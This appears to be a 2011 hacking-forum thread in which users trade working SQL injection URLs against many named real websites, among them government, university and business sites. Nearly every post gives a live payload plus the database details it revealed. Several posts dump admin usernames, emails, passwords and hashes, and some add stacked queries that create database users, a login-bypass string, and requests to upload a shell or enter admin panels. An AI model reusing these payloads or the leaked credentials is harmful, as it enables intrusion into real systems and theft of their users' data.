http://mynotebook.in/pages.php?page_id=73+and+bin(15)!=1111+union(selec t+distinct+1,2,3,4,5,6,7,group_concat(uname,':',pw ord)+from+mnb_members+where+pword+between+0+and+1+ order+by+uname+asc)

zlo12
25.01.2011, 12:18
PR=3 TIC=170

http://www.inoxpoint.ru/news.php?nid=74+UNION+SELECT+CONCAT(0x7873716C696E 6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716C6 96E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEMA. TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+1, 1/*

Database Version: 4.1.25-log

Database name: wwwinoxpointru_inoxbd

User name: inoxpoin@localhost

~d0s~
26.01.2011, 22:18
http://www.csufresno.edu/library/spotlight/item.php?spotlight=1+union+select+1+from(select+co unt(*),concat((select+concat_ws(0x3a,user,password ,file_priv)+from+mysql.user+limit+1,1),floor(rand( 0)*2))x+from+information_schema.tables+group+by+x) a

skuller
30.01.2011, 17:58
http://www.zwerg-schnauzer.info/search.php?Kennel=273+union+select+1,2,3,4,5,6,ver sion(),8,9--

Host IP: 77.222.40.111

Web Server: Apache/1.3.37-lk.d (Unix) mod_defer/0.1.lk mod_python/2.7.11 Python/2.4.3 PHP/4.4.4 mod_dp/lk.0.4.4

Powered-by: PHP/4.4.4

DB Server: MySQL >=5

Current User: rustrake_mini@localhost

AC//DC
01.02.2011, 18:04
http://banki.volgograda.ru/index.php?news=-1346%20and%201=2%20union%20select%201,2,concat_ws( 0x3a,@@version,user(),database(),@@version_compile _os),4,5,6,7,8--

4.0.27-max-log madara66@v43.valuehost.ru madara66 unknown-freebsd4.7

547
04.02.2011, 01:24
http://www.jewishbelarus.org/index.php?pid=25+union+select+1,2,3,user%28%29,5%2 0--+

Hack_ERR++
06.02.2011, 00:01
Code:
http://www.mrotb.com.au/viewproduct.php?sid=-26+union+select+1,2,3,4,5,6,7,8,9,version(),11,12, 13,14,15--

Cennarios
06.02.2011, 02:36
Now we're on a roll =)

http://www.1eurohosting.eu/default2.php?page=faq&faqcat_id=&faq_id=-53+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21--+

BARAKASH
06.02.2011, 18:14
http://www.34x.ru/pages.php?id=12+AND+ascii(lower(substring(database (),1,1)))>115+--+

version: 5.1.42

database(): analyti4_test

user(): analyti4

Fooog
11.02.2011, 00:58
Looks like an online game.

https://www.piratesdinneradventure.com/tickets/select_show.php?id=2+and((select+ascii(substring(t able_name,1,1))+from+information_schema.tables+lim it+0,1)=67)+--

Hack_ERR++
13.02.2011, 20:24
Code:
http://www.erau.ee/article.php?sid=-147+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2--
http://www.bigbay.bz/imagepop.php?id=-95+union+select+1,2,3,version()--
http://www.edim.ir/show.php?id=-81+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13--.
http://www.hsg.pl/en/index.php?id=-10+union+select+1,2,3,4,version(),6--
http://i-bot.com.au/ai2/page.php?sId=-38+union+select+version(),2--

Cennarios
14.02.2011, 14:40
http://www.y12.doe.gov/news/release.php?id=201+union+select+1,2,3,4,5,6,7,8,9, 10,11--+

http://www.whwebhosting.com/whmsys/announcements.php?id=-1'/**//*!union*//**//*!select*//**/1,2,version(),4,5/**/--+

http://webcolos.de/site/index.php?id=3310&pakketnummer=1'+union+select+1,user(),3,4,5,6,7--+

http://www.mainbase.de/news.php?id=-6+union+select+1,2,version(),4,5,6,7--+

http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,3,version(),5,6,7,8--+

Bwahahahaha!!!!

Unknown
14.02.2011, 14:46
http://www.colours-shop.com/news/new.php?id=9+union+select+1,version(),user()/*

fl00der
14.02.2011, 16:43
http://onlineofG00GLE IS OUTfshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb%27+UNION+SELECT+1,2,3,group_concat(versio n(),0x3a,user(),0x3a,database())+--+

Unknown
15.02.2011, 11:18
Cennarios said:
http://www.y12.doe.gov/news/release.php?id=201+union+select+1,2,3,4,5,6,7,8,9, 10,11--+
http://www.whwebhosting.com/whmsys/announcements.php?id=-1'/**//*!union*//**//*!select*//**/1,2,version(),4,5/**/--+
http://webcolos.de/site/index.php?id=3310&pakketnummer=1'+union+select+1,user(),3,4,5,6,7--+
http://www.mainbase.de/news.php?id=-6+union+select+1,2,version(),4,5,6,7--+
http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,3,version(),5,6,7,8--+
Bwahahahaha!!!!


I finished it off


Code:
http://www.ip-studio.de/news/index.php?lang=RU&id=-4'+union+select+1,2,login,password,5,6,7,8 FROM users LIMIT 56,1 --+

N@b$ter
15.02.2011, 15:18
http://www.allurebridals.com/index.php?id=-2+union+select+1,2,3,4,group_concat(concat_ws(0x3a ,email,password)+separator+0x3c62723e),6,7,8,9,10, 11,12,13,14+from+users--

dbo295655462@74.208.180.13:db295655462:5.0.91-log

Cennarios
15.02.2011, 22:25
http://www.fao.org/news/story/en/item/51042%20or%201%20group%20by%20concat((select%20ver sion()),floor(rand(0)*2))%20having%20min(0)/icode/

PR9

Author!!! Give me poison!!! =))

Hack_ERR++
17.02.2011, 15:32
Code:
http://www.ansdrive.ba/bs/page.php?id=-23+union+select+1,2,version()--

http://www.cybernet.cd/adresse.php?id=23+union+select+1,2,3,version(),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28--

Subscribe
18.02.2011, 02:43
http://www.thevalleypost.com/article.php?id=473-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

Unknown
19.02.2011, 14:27
asql said:
TABLE_NAME=’news’ the quotes get escaped. How do I get around this?
I'm only just starting to learn SQL, so...


http://moreprom.ru/news.php?id=-1/**/union/**/select/**/1,user(),COLUMN_NAME/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x6e657773/**/LIMIT/**/0,1--

Komyak
19.02.2011, 18:25
Code:
http://gps.smartzone.ru/razdel.php?id_raz=-1+UNION+SELECT+1,user()--&param=list

phpbb3_users

client

smartzone_users

danielito
19.02.2011, 22:53
http://indabattle.com/Malenkiy_Pavlik/?page=-255+union+select+1,2,3,table_name,5+from+informati on_schema.tables+limit+222,1--

admin panel is at /administrator

Can anyone upload a shell? Or get into the admin panel

passwords are in the form md5:salt

Hack_ERR++
21.02.2011, 11:17
Code:
http://autocatalog.bg/marka.php?id=-23+union+select+1,2,3,concat_ws(0x20,type,password ),5,6+from+admin_users--
http://www.bigbay.bz/develdesc.php?id=-23+union+select+1,concat_ws%280x20,id,username,pas sword%29,3,4,5,6,7,8,9,10,11,12,13+from+prop_admin--

barbara
21.02.2011, 17:22
Code:
http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+11--
http://kostroma.rfn.ru/rnews.html?id=46429+OR+1=1+ORDER+BY+SYSDATE--

Commands like these work, which suggests that the DBMS is Oracle and the table has 11 columns. If anyone knows Oracle well, feel free to play with it. Or is it unlikely that anything useful can be obtained here?

Cennarios
21.02.2011, 18:18
http://www.exploratorium.edu/imaging_station/gallery.php?Asset=Human%20red%20blood%20cells&Group=&Category=Blood%20Cells&Section=Introduction'+or+1+group+by+concat((select +user()),floor(rand(0)*2))+having+min(0)--+

user:imaging_station@www1.exploratorium.edu

Koren
21.02.2011, 19:18
smallville

http://smallville.fanwebsite.co.uk/music.php?smallville_episodeid=-67+union+select+1,version%28%29,3,4,5--

Slay90
21.02.2011, 21:17
//the anti-repost system is described in the first post

AC//DC
22.02.2011, 11:24
nothing personal

http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char( 58),@@version,user(),database(),@@version_compile_ os),3,4,5,6,7--

5.1.47-rel11.2-log djklm38@localhost djklm38_forall unknown-linux-gnu

http://islamvolga.ru/veroucheniya.php?cat=-1%20and%201=2%20union%20select%201,concat_ws(char( 58),username,password,email),3,4,5,6,7%20from%20er z_users--

winstrool
22.02.2011, 14:23
_http://k156.ru/2/1/catview.php?cat_id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--

_http://monolit44.ru/catviewarm.php?catarm_id=-10+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user())--

_http://stroyvektor.com/foto.php?fot=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7--

_http://citadel-kostroma.ru/catviewflat.php?cat57_id2=-9+union+select+concat_ws(0x3a,version(),database() ,user())--

_http://www.newchemistry.ru/himprocesses.php?cat_id=-36+union+select+concat_ws(0x3a,version(),database( ),user())--

_http://www.marich.od.ua/board.php?cat_id=-2+union+select+concat_ws(0x3a,version(),database() ,user())--

danielito
22.02.2011, 18:18
http://www.astrakhanfm.ru/news/news.php?id=99999+union+select+1,2,3,4,version(),6 ,7--

asql
23.02.2011, 12:54
http://la2-shop.ru/articles.php?id=-2'+union+select+1,2,version()--'

one big hole...

asql
23.02.2011, 19:59
http://www.doneco.org.ua/showwork.php?id=9999+union+select+1,version()--

4.1.22-standard-log...(

keng
24.02.2011, 22:06
Bar SPB.

h**p://www.barspb.ru/places.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--

Version: 5.1.50-log

User: u276147@10.8.3.13

TOP4
25.02.2011, 06:56
http://www.voladm.gov.ua/news.php?id=50901+union+select+1,user(),3,4,5,data base(),7,8,9,10,11,12,13,14--

TOP4
25.02.2011, 07:10
http://www.cva.edu/gallery/detail.php?ID=86-999.9+union+select+1,2,3,4,5,6,7--

http://biophysics.asu.edu/CBP/seminars.php?type=Meeting&ID=10647-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

http://www.arabpressnetwork.org/newspapersprint.php?id=173-999.9+union+select+1,2,3,4,5--

telon
25.02.2011, 11:40
http://www.mywowgold.ru/modules/zakaz/?data[form][blank_amount]='

keng
25.02.2011, 23:09
wcg.ru PR-5

h**p://www.wcg.ru/grandfinal/index.php?ID=-1+union+select+1,2--

h**p://www.wcg.ru/wcgtv/addcnt.php?ID=-1+union+select+1--

Version: 5.1.37

Database: wcg

User: wcg@localhost

nemaniak
25.02.2011, 23:33
russobit-press.ru


Code:
http://russobit-press.ru/forum.php/news.php?language=&stage=message&show=-31212+union+select+concat_ws(0x3a,version(),user() ,database()),2,3,4,5,6,7,8--



Code:
5.0.45:root@localhost:rbit

kansaspublicradio.org PR-5


Code:
http://kansaspublicradio.org/newsstory.php?itemID=15091+and+substring((SELECT+v ersion()),1,1)=5+--+

caldwellschools.org PR-5


Code:
http://www.caldwellschools.org/News/FullStory.php?NewsID=842+or+(select+count(*)+from+ (select+1+union+select+2+union+select+3)x+group+by +concat(mid(version(),1,63),floor(rand(0)*2)))+--+



Code:
Duplicate entry '5.0.261' for key 1

ubi
26.02.2011, 09:32
http://hyenacart.com/bellajunction/index.php?info=null+and+1=2+union+select+1,version (),3,4,5,6

4.1.22-standard

Fooog
26.02.2011, 18:06
acmenoveltyarchive.org

PR 4


Code:
http://www.acmenoveltyarchive.org/category.php?cat=-1 union select 1,concat_ws(0x3a,user(),version(),database()),3 --


stormdance.de

PR 4


Code:
http://www.stormdance.de/?cat=-22 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database ()),7,8,9 --


citymagazine.rs

PR 5


Code:
http://www.citymagazine.rs/page.php?cat=4 union select info() --


ipv6.njust.edu.cn

.edu

PR 1


Code:
http://ipv6.njust.edu.cn/show.php?id=-1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6,7,8,9,10,11,12,13,14,15 --

Konqi
27.02.2011, 01:00
http://www.auction.spb.ru/?lotID=16209+and+0+union+select+1,2,3,4,5,6,7,8,9, 10,concat_ws(0x3a,login,password,email),12,13,14,1 5,16,17,18,19,20,21+from+users

stasiliy
28.02.2011, 13:59
http://www.specialradio.ru/mkz/?id=-5+union+select+1,2,3,group_concat(version(),databa se(),user()),5,6,7,8,9--

bloodAngel
28.02.2011, 20:03
Code:
http://www.florenceforfun.org/index.php?id=%28select%201%20from%20%28select%20co unt%280%29,concat%28%28select%20version%28%29%29,f loor%28rand%280%29*2%29%29%20from%20information_sc hema.tables%20group%20by%202%20limit%201%29a%29

version :5.1.53-0.dotdeb.01

database :'mySql9296_fff1'

user : mySql9296@11.11.11.651


Code:
h ttp://www.mete.gov.al/galeri_info.php?l=a&p=44&ida=-2+union+select+1,2,3,concat_ws%28database%28%29,0x 3a,version%28%29,0x3a,user%28%29%29,5,6

database :web192db1

version: 5.0.77

user : web192u1@localhost


Code:
http://howtoremovecar.co.nz/gallery-main.php?gid=-5+union+select+1,2,group_concat%280x3a,username,0x 3a,password%29,4,5+from+admin_mst

admin:0f6969d7052da9261e31ddb6e88c136e :remove


Code:
http://www.meggitttrainingsystems.com/main.php?id=42+union+select+1,concat%280x3a,userna me,0x3a,password%29,3,4,5,6+from+fulfillment_users

chad.shaw@meggitt.com:meggitt


Code:
http://freecarremovals.co.nz/gallery-main.php?gid=-5+union+select+1,2,group_concat%280x3a,username,0x 3a,password%29,4,5+from+admin_mst

:admin:5797b26ee425c46a1de0a741885dcc0a :removals

ubi
28.02.2011, 21:52
http://www.creativephotographyinc.biz/page.php?pID=null+and+1=2+union+select+1,2,3,4

keng
01.03.2011, 19:43
Code:
h**p://www.mymym.com/en/gbook.php?owner=1+union+select+1,2,3--

Version: 5.0.51a-24+lenny5

Database: meetyourmakers@212.224.124.4

User: meetyourmakers_www

anII
02.03.2011, 20:07
http://www.automotorplex.com/page.php?id=1+union+select+1,database(),3,4,5

user:automoto_dbadmin@localhost

ver:4.1.22-standard

base:automoto_AMP

http://nwmetalcraft.com/manufacturer-page.php?Id=-22+union+select+1,2,3,4,user(),6,7

user:nwmetalcraft@97.74.24.170

base:nwmetalcraft

datadir:/var/lib/mysql_data/3/

ver:5.0.91-log

http://www.wizardbrazleme.com.br/new/page.php?id=-1+union+select+1,2,3

user:wizardbrazleme@10.5.3.68

base:wizardbrazleme

version:5.1.52

http://www.marcosdan.com.br/page.php?id=-1+union+select+1,2,3

user:marcosdan@10.5.3.61

base:marcosdan

version:5.1.52

http://www.segundoidioma.com/page.php?Id=-1+union+select+1,2,3

user:segundoi_raiz@localhos

base:segundoi_osc1

version:5.0.91-community

Unknown
04.03.2011, 23:06
Code:
http://www.gisa.ru/info_see.php?id=-528+UNION+SELECT+1,email,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58+from+secur_use rs+limit+1,5+--+



Code:
http://www.libroslibertad.ca/book.php?id=20+and+1=0+union+select+1,pwd,3,4,5,6, 7,8+from+users+--+



Code:
http://www.thedailybull.ca/article.php?id=-128+union+select+1,2,3,user_password,5,6,7,8,9,10+ from+phpbb_users+limit+1,15+--



Code:
http://esilibrary.ca/esi/newsitem.php?id=-140+union+select+1,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,3,4,5,6,7,8,9+--+

Cennarios
05.03.2011, 00:53
Government

Booyaka boo!!!

http://ojj.la.gov/index.php?page=sub&id=-25/**//*!union*//**//*!select*/1,2,3,user%28%29,5,6,7,8,9--+

user:ojj_new@localhost

anII
05.03.2011, 01:01
http://www.eskjaer-aa.dk/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9

http://www.paneltech.dk/page.php?page=99&id=-1+union+select+version(),2,3

http://www.delbeckvignobles.com/page.php?id=1+union+select+1,2,version(),4,5,6

http://www.manieres-de.com/page.php?id=1+union+select+1,2

http://lologogo.free.fr/page.php?id=1+union+select+1,2,3,4,5,6,7,8

Fooog
05.03.2011, 01:53
shams7.com


Code:
http://www.shams7.com/vbzoom/show.php?UserID=1&MainID=81&SubjectID=-14003 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 --



sportsnetsales.ca

PR 5

DB: snetsales


Code:
http://www.sportsnetsales.ca/show.php?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 --



rakedance.com

A poker-related site

rakedanc_rakedan@localhost:5.1.47-community-log:rakedanc_rakedance


Code:
http://www.rakedance.com/newsarc/show.php?id=-1 union select concat_ws(0x3a,user(),version(),database()) --


4nieuws.nl


Code:
http://4nieuws.nl/show.php?key=-24074 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database() ),6,7,8,9,10,11,12 --


billigehjemmesider.dk

DB: mysqluser14261

Blind


Code:
http://demo.billigehjemmesider.dk/show.php?p=-104 union select user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --

nemaniak
06.03.2011, 02:41
www.walsh.edu PR-5


Code:
http://www.walsh.edu/athleticsdetail.php?newsid=-874+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18+--+



Code:
5.0.77:walsh@localhost:Walsh

www.minnesotanationalguard.org PR-5


Code:
http://www.minnesotanationalguard.org/press_room/e-zine/articles/index.php?item=-484+UnIon+selECt+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21+--+



Code:
5.0.77-log:ng_internet@localhost:ng_internet

cit.mak.ac.ug PR-6


Code:
http://cit.mak.ac.ug/news_detail.php?item=-191+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6+--+



Code:
5.0.91-community:citmak_dbcit@localhost:citmak_fcit

anII
06.03.2011, 20:20
https://www.kisantech.com/index.php?cat_id=1+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10--

A_n_d_r_e_i
07.03.2011, 01:59
http://www.medtehnika.org/catalog.php?id=-123+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13+--

PR: 2

3Mind
07.03.2011, 05:34
Code:
http://www[dot]switch-foot[dot]com/view_item.php?item_id=-25+union+select+1,2,concat_ws(0x3b,username,passwo rd)+from+switchfoot.admin_table+--+



Code:
http://shop[dot]bsens[dot]com/bsens/index.php?param=item&item_id=-114'+union+select+1,2,concat_ws(0x3b,user_name,pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37+from+bsens_db.user_admin+--+&item_type_code=1&category_id=9&

DarkDante
07.03.2011, 10:18
http://meander.ca/lyrics.php?key=song_title&ID=-78+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3,4--

asql
07.03.2011, 14:15
http://www.almeidahotels.com/nm_quemsomos.php?id=-25/**/union/**/select/**/1,2,3,4,user(),6,7,8/*

anII
07.03.2011, 15:40
http://www.worstpreviews.com/review.php?id=115+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41--+

os:unknown-freebsd7.2

basedir:/usr/local/

base:alexgi_worstreview

tmpdir:/usr/tmp

datadir:/usr/local/var/

user:alexgi_2@localhost

ver:5.0.91-log

http://www.nowt2do.co.uk/review.php?id=606+and+1=0+union+select+1,2--+

basedir:/

tmpdir:/tmp/

user:nowt2do@localhost

ver:5.0.92-community

datadir:/var/lib/mysql/

osc-linux-gnu

http://www.dvdholocaust.com/review.php?id=289+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29

basejdvdholodvdholo

userjdvdholonakedralocalhost

ospclinuxgnu

ver4122standard

http://www.paperbackreader.com/review.php?ReviewID=2113+and+1=0+union+select+1,2, 3,4,5,6,7,8,9--+

ver:5.0.91-log

userbrmain@64.202.163.153

basebrmain

basedir:/usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/

datadir:/var/lib/mysql_data/1/

tmpdir:/tmp/mysqltmp/

os:unknown-linux-gnu

Fooog
08.03.2011, 01:49
cypee.com

Registrar


Code:
http://cypee.com/photo/show.php?title=Arashdeep_Singh&id=-1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4 --

tvchaty.com

rain@localhost:5.0.51a-community:rain_tvchaty


Code:
http://tvchaty.com/show.php?id=-1 union select 1,2,concat_ws(0x3a,user(),version(),database()),4, 5,6 --

externat.kspu.ru


Code:
http://externat.kspu.ru/forum/thread.php?threadid=-304 union select 1 --


forumer.com


Code:
http://fireandwater.1.forumer.com/index.php?showtopic=-591 order by 1 --

nethands.de


Code:
http://www.nethands.de/pys/show.php?id=165&skin=-5 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24 --

yesk88
09.03.2011, 01:16
bmz.fr


Code:
http://www.bmz.fr/achat/index.php?catid=-11+union+select+1,version(),3,4%20--

seaandsea.fr


Code:
http://www.seaandsea.fr/achat/index.php?catid=-43+union+select+1,version()%20--

protek.fr


Code:
http://www.protek.fr/achat/index.php?catid=-63+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17%20--

saint-vrain91.fr


Code:
http://www.saint-vrain91.fr/rubrique.php?catId=-41+union+select+unhex(hex(version())),2,3,4,5%20--

fape.fr


Code:
http://www.fape.fr/lire/index.php?catid=3+and+1=2+union+select+1,2,group_c oncat(user(),0x3a,database(),0x3a,version()),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17%20--

Compton
09.03.2011, 23:52
Code:
http://cgi.stanford.edu/~dept-ctl/tomprof/posting.php?ID=-752+union+select+1,2,3,4,5,6--

A_n_d_r_e_i
10.03.2011, 02:50
http://www.wavemovies.com/product.php?ID=-259+union+select+1,group_concat(column_name),3,4,5 ,6,7+from+information_schema.columns+where+table_n ame=0x636174616c6f67+--

Pr: 3

Unknown
10.03.2011, 13:20
http://www.vitek.ru/compare.php?all=-46%20union%20select%201,2,version(),4+--+

TIC450 PR5

A_n_d_r_e_i
10.03.2011, 15:45
http://windblowers.com/product.php?id=-73+union+select+1,2,3,4,group_concat(concat_ws(0x3 a,ID,Username,Password,FName,LName,LastUpdate,Acce ssLevel)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24+from+WBtblUser--+

Pr: 4

KoF31n
10.03.2011, 16:01
http://www.mtucizone.ru/list/index.htm?action=student&id=2286+and+1=0+union+select+1,2,group_c oncat(user(),0x3a,version(),database()),4,5,6,7,8, 9,1 0,11,12,13--

Version-5.0.90

User-mtucizone@localhost

Database-mtucizone

durito
10.03.2011, 16:24
a blind one on a dating site

http://www.findme4love.net/Gallery.Search.html?Lady=5080+and%20substring%28ve rsion%28%29,1,1%29=5&Submit=FindMe

bloodAngel
10.03.2011, 17:20
Code:
http://www.pchardware.ro/Reviews/review.php?id=-160+union+select+version%28%29--



Code:
http://www.worstpreviews.com/review.php?id=-115+union+select+group_concat%28column_name%29,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41+from+information_schema.columns+where+tab le_schema=%27alexgi_worstreview%27+and+table_name= %27user_reviews%27



Code:
http://www.digital-storytime.com/review.php?id=70+order+by+57

version :5.1.54

Compton
10.03.2011, 23:55
Code:
http://www.theanswerline.com/SubCategoryList.php?catid=-149+union+select+1,2,3,4,5,6,7,8,9,10,11--

AC//DC
11.03.2011, 09:41
Braun

http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x 3a,@@version,user(),database(),@@version_compile_o s),4,5,6--

5.1.53-log fleyg@localhost braun-bl portbld-freebsd8.1

http://www.braun-mall.ru/?dep=news&newsid=-19%20and%201=2%20union%20select%201,2,concat_ws(0x 3a,c_login,c_passwd,c_email,c_company,c_fio,c_phon e),4,5,6%20from%20ricsom_clients%20limit%201%20off set%201--

nemaniak
11.03.2011, 16:43
www.patagonianexpeditionrace.com PR-5


Code:
http://www.patagonianexpeditionrace.com/en/news_detail.php?news=-38+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11,12,13+--+



Code:
5.0.91-log:sitio@cgi1103.int.bizland.net:sitio

wisdencricketer.com PR-6


Code:
http://wisdencricketer.com/item.php?parent_id=3&child_id=0&item_id=-419+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18+--+



Code:
5.0.77-log:ansonrobson.new@localhost:wisden

Compton
11.03.2011, 19:50
Code:
http://www.minormania.com/feature.php?catid=757&id=-2132+union+select+1,2,3,4,5,6,7,8,9,10--

Fooog
12.03.2011, 01:18
citymagazine.rs

PR 5


Code:
http://www.citymagazine.rs/page.php?cat=4 union select info() --


4online.ru

Rank 2


Code:
http://www.4online.ru/tv/?channel=-104 union select 1,concat_ws(0x3a,user(),version(),database()),3,4, 5,6,7 --


ilikeamericanmusic.com

PR 3


Code:
http://www.ilikeamericanmusic.com/riff.php?EntryID=-1 union select 1,2,3,concat_ws(0x3a,user(),version(),database()) --


aldwick.net

PR 2


Code:
http://aldwick.net/directory.php?id=-3 UNION SELECT 1,group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAM E),3 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --

Fild3y
12.03.2011, 01:37
Code:
http://passionfitnesswear.com/ShoppingOnlineViewProduct.php?id_set=-1+union+select+1,group_concat(User,0x3b,Pass),3,4, 5,6,7,8,9,10+from+login

asql
12.03.2011, 20:29
http://www.displaysbyrioux.com/product.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x207c7c20,vers ion(),user(),database()),6--

http://www.schulmerichbells.com/category.php?cat_id=-100+union+select+1,2,3,4,concat_ws(0x3a3a3a,versio n(),user(),database()),6,7,8,9,10,11,12--

http://www.southworth.com/page.php?id=9999999+union+select+concat_ws(0x3c666 f6e7420636f6c6f723d27726564273e202d7c7c2d20,versio n(),user(),database())--

Konqi
12.03.2011, 21:48
http://www.carriertransicoldeurope.com/ml/service/service.php?sites=32+and+1=(select+version()::int+ from+pg_user)

http://www.jr-takashimaya.com/pc/pinf110h.php?id=&pass=&Category_ID=8&flg=o&daikb=1;create+user+Pun!sh3r;

http://www.kkt-sumai.jp/main/?category=8+and+1=(select+version()::int+from+pg_u ser)

Konqi
12.03.2011, 22:16
Code:
http://platerfinancial.com/planning/

authentication bypass (MySQL)

username : ' or 1=1--+

password : ' or 1=1--+

Compton
13.03.2011, 11:34
Code:
http://www.powermate.com/air_compressors/products.php?cat_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8--

Version: 5.1.53-log

asql
13.03.2011, 12:54
http://www.hotta.ru/model.php?id=-881+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,vers ion(),user(),database()),7,8,9,10,11,12,13,14--

v.4

Compton
13.03.2011, 13:10
Code:
http://www.hotelvictoriatrieste.com/hotel-Profile.html?id=-51+union+select+1,2,3,4,5,6,7,concat(username,0x3a ,password),9,10,11,12,13,14,15+from+wnbo_users--

5.x branch

asql
13.03.2011, 13:52
http://www.kinovdom.ru/catalog.php?catID=999999999999+union+select+concat _ws(0x3a3a3a,Login,Password)+from+logins+limit+0,1--

If anyone gets into the admin panel, please post the address (of the admin panel)

http://www.bbkingblues.com/bio.php?id=-10+union+select+1,2,concat_ws(0x3a3a3a,version(),u ser(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48--

48! Heh. Who's got more?

Fild3y
14.03.2011, 01:31
Code:
http://idm.com.np/newsdetail.php?id=-1+union+select+1,group_concat(username,0x3b,passwo rd),3,4,5,6+from+mytbladminlogin



Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(userna me,0x3b,password),10,11+from+tbladmin

HellFire
14.03.2011, 11:22
A little German newspaper:


Code:
http://www.atlantic-times.com/archive_detail.php?recordID=1-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(C ONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2 A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A6 56E64),0x71),0x71),6,7,8,9--

Database Version: 5.5.8

Database name: content

User name: content@localhost

LiRvD082
14.03.2011, 12:24
http://cat.rusbic.ru/?rgn=80&cn=1)+UNION+SELECT+null,null,cast(user+as+text),nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null--+


user=postgres

version()=PostgreSQL 8.3.11 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

current_database()=bb

inet_server_addr()=

Creating a new user:

id=27;CREATE USER hacker PASSWORD 'mypass';

Granting the user rights to create new databases and new users:

id=27;ALTER USER test1 CREATEUSER CREATEDB;

http://cat.rusbic.ru/?id=76;CREATE TABLE аааа (b text);


http://irkutsk.ru/users/profile/4424
http://irkutsk.ru/login/
POST:uml=konstantin@lagutin.com';+--+&upass=dgfjh
login:konstantin@lagutin.com';+--+
pass:12345




http://rusuper.ru/objs/view1.php?id_city=30&id_obj=-3251+UNION+SELECT+1,2,3,group_concat(unhex(hex(col umn_name))),5,6,7,8,9+FROM+INFORMATION_SCHEMA.colu mns+where+table_name=0x7573657273--

stasiliy
14.03.2011, 20:46
http://pcboards.ru/show.php?dev=109+order+by+13

asql
14.03.2011, 22:34
